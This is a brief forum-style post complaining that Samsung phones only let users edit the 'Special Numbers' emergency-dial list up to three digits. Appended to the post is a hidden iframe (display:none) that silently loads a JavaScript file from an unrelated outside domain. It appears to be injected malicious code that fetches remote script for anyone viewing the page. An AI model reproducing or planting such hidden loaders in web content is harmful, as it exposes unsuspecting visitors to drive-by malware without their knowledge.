I called Samsung Level 2 support to ask about the Special Numbers section, per the great owners manual we are supposed to be able to edit. Well you edit them but not beyond 3 digits.

It appears Samsung figures those hot numbers you would want when the phone is locked would be 911 (obviously) but other great ones like 411, 611, 228 things you woudn't need.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
